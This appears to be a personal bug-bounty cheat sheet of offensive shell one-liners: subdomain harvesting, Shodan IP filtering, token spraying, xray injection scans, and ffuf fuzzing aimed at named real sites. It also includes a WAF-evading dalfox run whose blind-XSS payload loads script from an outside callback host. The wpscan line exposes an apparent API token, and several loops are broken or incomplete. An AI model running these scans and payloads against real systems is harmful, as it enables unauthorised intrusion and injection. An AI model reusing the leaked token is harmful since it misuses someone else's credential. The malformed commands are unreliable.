
#oneliners-tools
...................................

#subdomains-downalod-chaos
wget "https://chaos-data.projectdiscovery.io/index.json" && cat index.json | grep "URL" | sed 's/"URL": "//;s/",//' | while read host do;do wget "$host";done && for i in `ls -1 | grep .zip$`; do unzip $i; done && rm *.zip && cat *.txt >> alltargets.txt


#bug-bounty-targets-find
#..............................................................................................................................................

#chaos list
curl -sL https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/main/chaos-bugbounty-list.json | jq -r '.programs[].domains | to_entries | .[].value'

#google dorks

#use full commands
#..............................................................................................................................................


while read domain do
for i in {1..10}; do 

cat ip.txt |xargs -n1 -I{} whois -h whois.cymru.com {}

#nuclei-token-api-token-checking

nuclei -tags token-spray    -var token=

#ip-filter
#..............................
cat wilecard singal | while read host ;do cat shodan/ip.txt |tlsx -san -cn -silent |grep $host |grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' |anew shodan/ips.txt  ; done ;

#ip-filter
cat wilecard singal | while read host ;do cat shodan/ip.txt |hakip2host -t 100 |grep $host |grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' |anew shodan/ips.txt  ; done ;
rm shodan/ip.txt ;sleep 5 ;



#bug0bounty-program checking
................................

cat all-bugbounty-domains.txt|while read h ;do cat vuln-host.txt |grep $h|sort -u|anew hack;done


#exploit-download

https://github.com/vulnersCom/getsploit


#date
echo "$(date '+%D %T' | toilet -f term -F border --gay)"

#banner

echo SUB-ENUM| toilet -f term -F border --gay

#Xray 
./xray_linux_amd64 ws --url-file url.txt --plugins xss,sqldet,xxe,ssrf,cmd-injection,path-traversal --ho $(date +"%T").html 
./xray_linux_amd64 ws --url-file url.txt  --ho $(date +"%T").html 



#directory fuzzing
#..............................................................................................................................................

#wordlist

~/wordlist/dicc.txt 
~/wordlist/fuzz.txt
~/wordlist/httparchive_directories_1m_2024_04_28.txt
~/wordlist/onelistforallshort.txt 


dirsearch -o dirsearch.txt -u

feroxbuster -w ~/wordlist/onelistforallshort.txt -fs 200,301,401 -u 


ffuf -w  ~/wordlist/onelistforallshort.txt  -c -mc 200,302,301 -u 

#fuzzing files

ffuf  -w ~/wordlist/eng-list.txt -mc 200,302  -u https://frontend-helper.kucoin.com/FUZZ.html
ffuf  -w ~/wordlist/eng-list.txt -mc 200,302  -u https://redwolf.in/FUZZ.zip
ffuf  -w ~/wordlist/eng-list.txt -mc 200,302  -u https://redwolf.in/FUZZ.php



#wpscan
#..............................................................................................................................................

wpscan    --force  --scope  --rua -e vt,vp  --api-token NrZ3QLaKW3F4WSnL4t2bLPEaqwoxySWvtDTxEnmJSBs --ignore-main-redirect --url  


#bypass 403

nomore403  -H "Environment: Staging"  -m 10 -d 200 -f ~/tools/nomore403/payloads/ -u 

#..............................................................................................................................................



#dalfox
cat |uro|dalfox pipe  --waf-evasion  -b "<script src="https://js.rip/llpuzsq3gz"></script>"   -o dalfox.txt

#xsstick
cat  |uro| while read domain; do python3 ~/tools/XSStrike/xsstrike.py   --log-file xsstrikc.txt  -u $domain ;done




